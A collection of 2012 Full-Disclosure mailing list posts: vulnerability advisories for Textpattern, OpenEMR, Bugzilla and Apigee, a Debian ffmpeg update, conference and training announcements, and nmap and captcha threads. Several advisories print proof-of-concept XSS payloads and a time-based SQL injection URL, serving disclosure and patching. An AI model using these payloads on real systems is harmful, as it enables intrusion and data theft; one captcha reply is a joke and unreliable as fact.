[Full-disclosure] TWSL2012-001: Cross-Site Scripting Vulnerability in Textpattern Content Management System

[Trustwave Advisories]

Trustwave's SpiderLabs Security Advisory TWSL2012-001:
Cross-Site Scripting Vulnerability in Textpattern Content Management System

Published: 1/03/12
Version: 1.0

Vendor: Textpattern (http://textpattern.com/)
Product: Textpattern
Version affected: 4.4.1 before change set 3612

Product description:
Textpattern is an open source content management system originally
developed by Dean Allen. While it is often listed among weblogging tools,
its aim is to be a general-purpose content management system suitable for
deployment in many contexts. Textpattern is written in PHP using a MySQL
database backend.

Credit: Jonathan Claudius of Trustwave SpiderLabs

Finding 1: Cross-Site Scripting Vulnerability
CVE: CVE-2011-5019

After extracting the Textpattern source files on to a web server, but
before the application is fully installed, cross-site scripting
vulnerabilities are present in the '/textpattern/setup/index.php' page.

Example(s):

Performing XSS on "ddb" parameter

#Request

POST /textpattern/setup/index.php HTTP/1.1

Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/textpattern/setup/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 156

duser=blah&dpass=&dhost=localhost&ddb=%3Cscript%3Ealert%28%27123%27%29%3C%2
Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=print
Config

#Response

HTTP/1.1 200 OK
Date: Sat, 10 Dec 2011 02:46:44 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.2
Content-Length: 674
Connection: close
Content-Type: text/html; charset=utf-8



Checking database
connectionConnectedDatabase
alert('123') does not exist or your
specified user does not have permission to access it.

Remediation Steps:
Textpattern change set 3612 includes a fix for this security issue. Upgrade
to the latest version.


Revision History:
12/23/11 - Vulnerability disclosed
12/23/11 - Patch released by vendor
1/03/12 - Advisory published


About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.

This transmission may contain information that is privileged, confidential, 
and/or exempt from disclosure under applicable law. If you are not the intended 
recipient, you are hereby notified that any disclosure, copying, distribution, 
or use of the information contained herein (including any reliance thereon) is 
STRICTLY PROHIBITED. If you received this transmission in error, please 
immediately contact the sender and destroy the material in its entirety, 
whether in electronic or hard copy format.

___
Full-Disclosure - We believe in it.

[Full-disclosure] InfoSec Southwest 2012 CFP First-round Speaker Selections

[I)ruid]

Hello,

InfoSec Southwest is proud to announce our keynote speaker and
first-round speaker selections for our 2012 conference.  Our CFP remains
open until February 1st 2012 after which we will make our remaining
final speaker selections.  CFP information is available at:

http://www.infosecsouthwest.com/cfp.html

Keynote Speaker: Peiter "Mudge" Zatko

We're quite excited to have Mudge accept our invitation to be our
Keynote speaker.  One of our goals for this conference is to bring
together a balanced attendance sourcing from the hacker community,
InfoSec professionals communities, as well as the Government and
Military InfoSec community.  Just from our regional area here in Texas
there is a strong presence from all of these communities, and we hope to
draw as many of you from all of these communities outside our regional
area as well.  Mudge was an obvious choice for our keynote, having a
long and solid history with the hacker and professional InfoSec
communities, and more recently with the public sector with his
involvement in DARPA and his Cyber Fast Track initiative.

First-round CFP Speaker Selections:

Lurene "pusscat" Grenier & Nick DePetrillo - Le Chat-SEC
Joshua "jduck" Drake - Exploiting Memory Corruption in the Java Runtime
Joseph "AverageJoe" Giron - Creating Your Own Windows Debugger in C
Gursev Singh Kalra - Attacking CAPTCHAs for Fun and Profit
Karthik Raman - Selecting Features to Classify Malware

For speaker bios and lecture details, please visit the lectures page on
the conference website:

http://www.infosecsouthwest.com/lectures.html

We're also happy to announce the availability of a few advanced training
courses that will be available following the InfoSec Southwest 2012
conference:

The Art of Exploiting SQL Injection - Sumit Siddharth
Binary Literacy: Static Reverse Engineering - Rolf Rolles
Metasploit Mastery - James "egypt" Lee

If you are interested in training, you can find the full details for
these training courses on the conference website:

http://www.infosecsouthwest.com/training.html

Thanks,

-- 
I)ruid, C²ISSP
dr...@caughq.org
http://druid.caughq.org


signature.asc
Description: This is a digitally signed message part
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 2378-1] ffmpeg security update

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2378-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
January 03, 2012   http://www.debian.org/security/faq
- -

Package: ffmpeg
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-4351 CVE-2011-4353 CVE-2011-4364 CVE-2011-4579 

Several vulnerabilities have been discovered in ffmpeg, a multimedia 
player, server and encoder. Multiple input validations in the decoders
for QDM2, VP5, VP6, VMD and SVQ1 files could lead to the execution of
arbitrary code.

For the stable distribution (squeeze), this problem has been fixed in
version 4:0.5.6-3.

For the unstable distribution (sid), this problem has been fixed in
version 4:0.7.3-1 of the libav source package.

We recommend that you upgrade your ffmpeg packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk8DbYoACgkQXm3vHE4uylrBFgCffjBtnGpVL0rDLXmAud6Bguyf
W+8AoKmTyTgtZRk3tYduJ2CccCD6LwHt
=HgJa
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] OFF-Spanish content: CURSO WEB HACKING ONLINE GRATUITO.

[runlvl]

Web Hacking & Exploiting Workshop
Modalidad: Online en vivo
Instructor: Juan Sacco
Costo: 50 usd  ( Para pagar streaming )
Anotate ya mismo desde el siguiente link:
https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=6S3XRPJFC4ALN

IMPORTANTE.
Costo del curso: Se recauda solo para pagar el streaming

Vacante limitadas, ( por el ancho de banda )

Introduccion:
El curso de seguridad en aplicaciones Web de Exploit Pack se focaliza
en enseñar a los asistentes las distintas vulnerabilidades Web y la
manera en la cual estas pueden ser identificadas de manera manual o
automatizada. Durante el curso se enseñarán los conceptos teóricos,
seguidos por prácticas hands-on realizadas en el laboratorio
especialmente diseñado para el curso.

Objetivo:
Proveer a los asistentes de los conocimientos, herramientas y técnicas
necesarias para comprender los distintos tipos de vulnerabilidades Web
existentes, para que luego ellos mismos sean capaces de
identificarlas.

Instructor:
Juan Sacco es un desarrollador de exploits y rootkits y a trabajado en
diversas compañias como ESET, Core Security y ArCERT, ahora mismo se
ocupa del desarrollo de la herramienta de seguridad
informatica para testeos de intrusion libre y GPL, Exploit Pack, mas
info en http://exploitpack.com

Material para el alumno:
- Diapositivas del training
- Live CD con herramientas de seguridad en aplicaciones Web utilizado
durante el training
- Imagen de VMware con el ambiente de training

Duracion: 2 clases intensivas
Modalidad: En linea, en vivo.
Fechas: Viernes 14 y Viernes 21
Horario: 19:00 ( GTM -3:00 )
Examen final: Si ( Aprobar el examen final es un requerimiento para
entregar certificado )

Temario:
  1. Mensajes de error y excepciones
  2. Path Disclosure
  3. OS Commanding
  4. Local file read
  5. Inclusión local de archivos
  6. Path Traversal and Null Bytes
  7. Remote file inclusions
  8. HTTP Response Splitting
  9. Vectores de ataque poco comunes
  10. LDAP Injection
  11. PHP preg_replace vulnerabilities
  12. SQL Injection
  13. Blind SQL Injection
  14. Cross Site Scripting (XSS)
  15. Cross Site Request Forgeries / Session Riding
  16. Vulnerabilidades en aplicaciones Web 2.0

Preguntas? jsa...@exploitpack.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] SQL Injection Vulnerability in OpenEMR 4.1.0

[Netsparker Advisories]

Information

Name :  SQL Injection Vulnerability in OpenEMR
Software :  OpenEMR 4.1.0 and possibly below.
Vendor Homepage :  http://www.open-emr.org
Vulnerability Type :  SQL Injection
Severity :  Critical
Researcher :  Canberk Bolat
Advisory Reference :  NS-12-001

Description

OpenEMR is a Free and Open Source electronic health records and
medical practice management application. OpenEMR is ONC Complete
Ambulatory EHR certified and features fully integrated electronic
health records, practice management, scheduling, electronic billing
and internationalization.

Details

OpenEMR is affected by a SQL Injection vulnerability in version 4.1.0.
Example PoC url is as follows :

http://example.com/interface/login/validateUser.php?u='%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)%2b'

You can read the full article about SQL Injection vulnerability from
here : http://www.mavitunasecurity.com/sql-injection/.

Solution

The vendor released a patch for this vulnerability. Please see the references.

Credits

It has been discovered on testing of Netsparker, Web Application
Security Scanner - http://www.mavitunasecurity.com/netsparker/.

References

Vendor Url / Patch : http://www.open-emr.org/wiki/index.php/OpenEMR_Patches
MSL Advisory Link
:http://www.mavitunasecurity.com/sql-injection-vulnerability-in-openemr/
Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/

About Netsparker

Netsparker® can find and report security issues such as SQL Injection
and Cross-site Scripting (XSS) in all web applications regardless of
the platform and the technology they are built on. Netsparker's unique
detection and exploitation techniques allows it to be dead accurate in
reporting hence it's the first and the only False Positive Free web
application security scanner.

-- 
Netsparker Advisories, 
Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [RT-SA-2012-001] Bugzilla: Cross-Site Scripting in Chart Generator

[RedTeam Pentesting GmbH]

Advisory: Bugzilla: Cross-Site Scripting in Chart Generator

RedTeam Pentesting discovered a Cross-Site Scripting (XSS) vulnerability
in Bugzilla's chart generator during a penetration test.  If attackers
can persuade users to click on a prepared link or redirected them to
such a link from an attacker-controlled website, they are able to run
arbitrary JavaScript code in the context of the Bugzilla installation's
domain.

Details
===

Product: Bugzilla
Affected Versions: 2.17.1 to 3.4.12, 3.5.1 to 3.6.6, 3.7.1 to 4.0.2,
   4.1.1 to 4.1.3
Fixed Versions: 3.4.13, 3.6.7, 4.0.3, 4.2rc1
Vulnerability Type: Cross Site Scripting
Security Risk: high
Vendor URL: http://www.bugzilla.org
Vendor Status: fixed version released
Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2012-001
Advisory Status: published
CVE: CVE-2011-3657
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3657


Introduction


"Bugzilla is a 'Defect Tracking System' or 'Bug-Tracking System'. Defect
Tracking Systems allow individual or groups of developers to keep track
of outstanding bugs in their product effectively. Most commercial
defect-tracking software vendors charge enormous licensing fees. Despite
being 'free', Bugzilla has many features its expensive counterparts
lack.  Consequently, Bugzilla has quickly become a favorite of thousands
of organizations across the globe."

(from Bugzilla's homepage)


More Details


The chart-generating script chart.cgi contains a method plot(), that
creates a new chart:

sub plot {
validateWidthAndHeight();
$vars->{'chart'} = new Bugzilla::Chart($cgi);

my $format = $template->get_format("reports/chart", "", 
scalar($cgi->param('ctype')));

# Debugging PNGs is a pain; we need to be able to see the error messages
if ($cgi->param('debug')) {
print $cgi->header();
$vars->{'chart'}->dump();
}

print $cgi->header($format->{'ctype'});
disable_utf8() if ($format->{'ctype'} =~ /^image\//);

$template->process($format->{'template'}, $vars)
  || ThrowTemplateError($template->error());
}

The function's code shows that there is a "debug" parameter, that, if
set, will make the function print out the variable that represents the
chart with the dump() method implemented in Chart.pm:

sub dump {
my $self = shift;

# Make sure we've read in our data
my $data = $self->data;

require Data::Dumper;
print "Bugzilla::Chart object:\n";
print Data::Dumper::Dumper($self);
print "";
}

The dump() method then prints the given data structures without any
further checks. This includes user-defined variables sent as URL or HTTP
POST parameters, especially "label0". As the content of this variable is
not checked for malicious input, it can be used to inject arbitrary
JavaScript code into the debugging output. In fact, any variable of the
form "labelXXX", where "XXX" is an arbitrary number, will work. The
view() method in chart.cgi also invokes dump() when the "debug"
parameter is set:

sub view {
[...]
# If we have having problems with bad data, we can set debug=1 to dump
# the data structure.
$chart->dump() if $cgi->param('debug');
[...]
}

After reporting the bug, the Bugzilla team discovered that almost the
same code is used in report.cgi, too, leading to the same problem:

# Problems with this CGI are often due to malformed data. Setting debug=1
# prints out both data structures.
if ($cgi->param('debug')) {
require Data::Dumper;
print "data hash:\n";
print Data::Dumper::Dumper(%data) . "\n\n";
print "data array:\n";
print Data::Dumper::Dumper(@image_data) . "\n\n";
}

Triggering this XSS is more involved though. One attack vector would be
for example to create a Bugzilla account, set one's own real name to
contain JavaScript code, add a new bug and then create a report where
one of the axes is the assignee's real name. Adding the debug=1
parameter to the resulting image URL will then include the name in the
output, triggering the XSS.


Proof of Concept


The following URL generates a new chart with debugging output enabled,
containing JavaScript code in the "label0" parameter:

http://www.example.org/bugzilla/chart.cgi
  ?category=-All-
  &datefrom=
  &dateto=
  &label0=alert("XSS")
  &line0=1
  &name=1
  &subcategory=-All-
  &ctype=png
  &action=plot
  &width=600
  &height=350
  &debug=1

The next URL triggers an XSS if one's real name includes JavaScript
code, e.g. 'John Doealert("XSS")':

http://www.example.org/bugzilla/report.cgi
  ?query_format=report-graph
  &x_axis_field=bug_status
  &x_labels_vertical=1
  &y_axis_field=assigned_to_realname
  &format=bar
  &ctype=png
  &action=plot
  &width=600
  &height=350
  &debug=1


Workaround
==

Manually remove the debugging code from chart.cgi and report.cgi, as it
is not needed for Bugzilla to function properly.


Fix
===

Update to one of the following versions: 3.4.13, 3

Re: [Full-disclosure] Nmap

[Zach C.]

Yet another note, this one ARP-related: while true that most devices on
your local network will respond to ARP, it's important to note (as the
wording of "almost certain" implies) that it is possible to purposely
suppress ARP responses to all but a few hosts. I know for certain that the
Linux kernel has a module (and associated toolset) specifically for that
sort of thing called arptables, with usage very similar to iptables if
you're already familiar with that.

There's also a tool (again on *nix) called arping, which is ping but with
ARP requests. Device firewalls (or at least Windows's built in firewall)
tend(s) not to block ARP requests or replies, so arping might be able to
show you those firewalled hosts, too. (That doesn't mean those hosts aren't
properly configured to correctly block incoming traffic, however!)

On Mon, Jan 2, 2012 at 2:10 PM, Gage Bystrom wrote:

> (I don't have the original, so ill qoute this guy)
>
> Nmap has an option to change how it determines if a host is up by
> attempting a port connection instead. I find this to be highly effective.
> Using a couple of standard ports are the best, such as 80, 21, etc. If you
> only have a few ports your searching for, then drop host discovery and scan
> those specific ports, youd get the same results but a tad bit less
> overhead(mainly in the sense of stealth or an obsession with not wasting
> bandwidth if you can help it)
> On Jan 2, 2012 1:00 PM, "S Walker"  wrote:
>
>>
>> Just an added note to the current replies (which are all great for hosts
>> not in the local broadcast domain): It is almost certain that every device
>> in your local network will respond to an ARP request. nmap does this by
>> default anyway (-PR for local networks), but it's worth bearing in mind, as
>> something local that won't respond to an ARP request is almost certainly
>> not reachable.
>>
>> S
>>
>> 
>> > Date: Mon, 2 Jan 2012 12:03:42 -0500
>> > Subject: Re: Nmap
>> > From: juan.qu...@gmail.com
>> > To: pen-t...@securityfocus.com
>> >
>> > Sorry for the late answer...
>> >
>> > But when you scan for machines that do not answer to ping (it means
>> > answer with an echo reply for each echo request), you could try using
>> > timestamp, and will return timestamp reply, and also information
>> > request and wait for an information reply
>> >
>> > Both coould be useful also to detect equipments that do not answer to
>> > ping. And if you want something more "noisy" maybe a network discovery
>> > or a -P0 option.
>> >
>> > Here is a summary of message types with their port (for ICMP protocol).
>> >
>> > 0 Echo Reply
>> > 3 Destination Unreachable
>> > 4 Source Quench
>> > 5 Redirect
>> > 8 Echo
>> > 11 Time Exceeded
>> > 12 Parameter Problem
>> > 13 Timestamp
>> > 14 Timestamp Reply
>> > 15 Information Request
>> > 16 Information Reply
>> >
>> > More detail on: http://www.faqs.org/rfcs/rfc792.html
>> >
>> > Hope it will be useful.
>> >
>> > Regards,
>> >
>> > Juan Pablo.
>> >
>> > On Sun, Oct 2, 2011 at 4:35 PM, John M. Martinelli
>> >  wrote:
>> > > This would work but it would be kind of "noisy" to open port scan
>> > > every host. Also probably a little more time consuming.
>> > >
>> > > Adding in syn scan or open port scan will create more time required as
>> > > we're now looking for open ports. What if all ports are closed? Will
>> > > it respond to a certain type of ICMP?
>> > >
>> > > I think a great question to ask is: "What is the least-impactful way I
>> > > can very quickly determine what hosts are alive?" without a
>> > > traditional ping sweep.
>> > >
>> > > On Sat, Oct 1, 2011 at 10:37 PM, Jeffory Atkinson  wrote:
>> > >>
>> > >> All depends on what you are trying to achieve. I would assume that
>> you are not concerned about monitoring devices seeing you have done a ping
>> sweep with nmap. I agree with others a port scan is going to give you the
>> best idea if a host is active. There are Many instances filtering devices
>> can drop icmp or respond for hosts behind them.  Open ports and services
>> are the best identifiers. A port has to be open in some form (open or
>> filtered) to interact with in-bound connections. I would recommend a -sS
>> (syn) scan you can opt for standard services or add -p1- for all 65k+
>> ports. All ports will verify and services/demons running. There are other
>> options if bandwidth is an issue.
>> > >>
>> > >>
>> > >> On Sep 30, 2011, at 5:17 PM, Ukpong  wrote:
>> > >>
>> > >> > Can somebody suggest the best NMAP commands for identifying hosts
>> that
>> > >> > are not responding to ICMP ping requests ?
>> > >> >
>> > >> >
>> 
>> > >> > This list is sponsored by: Information Assurance Certification
>> Review Board
>> > >> >
>> > >> > Prove to peers and potential employers without a doubt that you
>> can actually do a proper penetration test. IACRB CPT and CEPT certs require
>> a full practical examination

[Full-disclosure] Apigee Facebook API - Cross site scripting

[asish agarwalla]

Title:
---
Apigee Facebook API - Cross site scripting


Vendor status:
---
[18.12.2011] Vulnerability discovered.
[19.12.2011] Contact with the vendor.
[26.12.2011] Vulnerability patched by vendor.


Introduction

Apigee is for a new internet of APIs - where billions of mobile, tablets,
and set-top apps connect in a web that has moved beyond the browser. Over
200 enterprises and thousands of developers use Apigee technology to make
their APIs better.

Apigee also provide  API to Connect facebook with the Graph API.

web page: http://apigee.com/
Facebook API console : https://apigee.com/console/facebook#


Abstract
---
Apigee facebook api do not validate or encode the facebook response.


Details:

If attacker post any malicious script in victim wall/send message/write a
comment and victim visit that page through Apigee Api that malicious script
get executed. It not only affects the victim user but also affect all the
users who will visit that page using Apigee API.

Using this vulnerability attacker can steal user cookie and can preformed
all the action that user can performed using the Apigee API.

@Asish
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] captcha

[Ryan Chapman]

Awesome topic, i'm looking forward to hearing alot more about this.
There is Ted talking video explaining, but not into the security end of it.

http://blog.ted.com/2011/12/06/massive-scale-online-collaboration-luis-von-ahn-on-ted-com/



On Mon, Jan 2, 2012 at 10:56, Jan van Niekerk  wrote:

> On Sun, Jan 1, 2012 at 3:43 PM, ebhakt  wrote:
> > Hii guys,
> Hii Ebhakt
>
> > I want to know the logic behind creating a captcha imagey
> > I know how the servers are designed and what the captcha security does!!
> > but how the captcha imagae is generated
> > that's my main question !!
> The code that generates captcha imagey is top secret proprietary
> software.  Only the top software engineers of the global captcha
> security firms have access to the source code, and then only when each
> one of them provides half of the security key to decode the system.
> The code is never actually loaded in memory.  If this code ever got
> into the wrong hands then the entire captcha security system would be
> broken.
> >
> > Any ideas , guesses !!
> Maybe do a dictionary attack.
> > Just mail around !!
> >
> > Thanks
> your welcome hopes this helps
>
> 
> Securing Apache Web Server with thawte Digital Certificate
> In this guide we examine the importance of Apache-SSL and who needs an SSL
> certificate.  We look at how SSL works, how it benefits your company and
> how your customers can tell if a site is secure. You will find out how to
> test, purchase, install and use a thawte Digital Certificate on your Apache
> web server. Throughout, best practices for set-up are highlighted to help
> you ensure efficient ongoing management of your encryption keys and digital
> certificates.
>
>
> http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1
> 
>
>


-- 
Ryan Chapman
514.245.0498
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Slides of our "Hacking IPv6 Networks" training at DEEPSEC 2011

[Vikram Dhillon]

Hey Fernando,

I was wondering if the talk was recorded online and is available after
the conference. Could you link me to it, please? Thanks for your time!

- Vikram

On Mon, Dec 19, 2011 at 2:12 PM, Fernando Gont  wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Folks,
>
> We have uploaded *part* of the materials of the DEEPSEC 2011 edition of
> our training "Hacking IPv6 Networks".
>
> The slideware is available at:
> 
>
> Follow Us on twitter: SI6Networks
>
> Thanks!
>
> Best regards,
> - --
> Fernando Gont
> SI6 Networks
> e-mail: fg...@si6networks.com
> PGP Fingerprint:  31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
>
>
>
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.11 (GNU/Linux)
>
> iQIcBAEBAgAGBQJO74yLAAoJEK4lDVUdTnSSixMQAK3cqDrNWF3LxIO2W2/QjEIe
> qVCAehoIVEwixe6G81oE7I2N8i6Ydt08C8MvYfTLAVjqOnFMlyEWIQ1qyIAYX0lG
> Q+LS+rv7szcGg3W4R/Ry/yD5RVcnj56y2aLrAqLbPNwASX7u8Wuam3tHaGxe66VG
> sYMqVAqBI6g7KVF1xlPozQcWRNRqmf04XOA5sLHYNzYsBtzsOTPxoXyzbzwslWBr
> RHgdJxUq92cAGCS18FkaXjLRxaL7xY+oEFANwNhrN+FuvOfrYenKdCRJ01VJSH39
> 7BDFfw2/NUtAixlz5QES7PBPlK4PL3Y7Qm3NkK9+U3BsXATyr7vrjkgzklnXoAgn
> pElmRIs5eRPCPxRhK6ihxA7Eszy84O90tofQNtp87lHEAk9Uc17Aj8aafVKVCjmm
> 9c0CrKZfqf9c5GgFwEgFmD9XXm4SSjj36ABusIohXDfv31TAMVA5gLKz25CnIXCF
> F+DPQp7NIxBVYIV+3uZDXReWYLyIV21nWO/S2pMHu22hACAPoOOstVcKqyNrcEW6
> G/Ii2uA8UubuMOpAI4cRi0pGId8lcBQZ6PzStp99pxzV6oXTUyPZWyd5e+t3l1a6
> 7Q2zpsAYo40yyqw1Jo2lQiGNDTheyyro24YZib7dp0YixDF3MYQefRsn3MouPSX5
> pKTMn7K1RCeUilQ8fiiF
> =AoHy
> -END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [TOOL RELEASE] Technitium MAC Address Changer v6 (FREEWARE)

[Shreyas Zare]

Hi,

Technitium MAC Address Changer allows you to change Media Access
Control (MAC) Address of your Network Interface Card (NIC)
irrespective to your NIC manufacturer or its driver. It has a very
simple user interface and provides ample information regarding each
NIC in the machine. Every NIC has a MAC address hard coded in its
circuit by the manufacturer. This hard coded MAC address is used by
windows drivers to access Ethernet Network (LAN). This tool can set a
new MAC address to your NIC, bypassing the original hard coded MAC
address. Technitium MAC Address Changer is a must tool in every
security professionals tool box.

Visit http://tmac.technitium.com for more information and download links.


NEW FEATURES
=

+= Internet Protocol v6 (IPv6) support added.

+= Works on Windows 7 and Windows 8 (Developer Preview) for both
32-bit and 64-bit.

+= Automatic Update feature added to update software to latest
available version.

+= Update network card vendors list feature allows you to download
latest vendor data (OUI) from IEEE.org.

+= Enhanced network configuration presets with IPv6 support allow you
to quickly switch between network configurations.

+= Command line options with entire software functionality available.
You can select a preset from specified preset file to apply directly.

+= Issues in previous version ironed out.


Visit http://tmac.technitium.com for more information and download links.

Regards,

(If debugging is the process of removing bugs, then programming must
be the process of putting them in --Edsger Dijkstra)

Shreyas Zare
Co-Founder, Technitium
eMail: shre...@technitium.com
Follow @shreyasonline on twitter

Check out Technitium | Blog [http://blog.technitium.com]
Follow @Technitium on twitter

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] captcha

[Jan van Niekerk]

On Sun, Jan 1, 2012 at 3:43 PM, ebhakt  wrote:
> Hii guys,
Hii Ebhakt

> I want to know the logic behind creating a captcha imagey
> I know how the servers are designed and what the captcha security does!!
> but how the captcha imagae is generated
> that's my main question !!
The code that generates captcha imagey is top secret proprietary
software.  Only the top software engineers of the global captcha
security firms have access to the source code, and then only when each
one of them provides half of the security key to decode the system.
The code is never actually loaded in memory.  If this code ever got
into the wrong hands then the entire captcha security system would be
broken.
>
> Any ideas , guesses !!
Maybe do a dictionary attack.
> Just mail around !!
>
> Thanks
your welcome hopes this helps

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/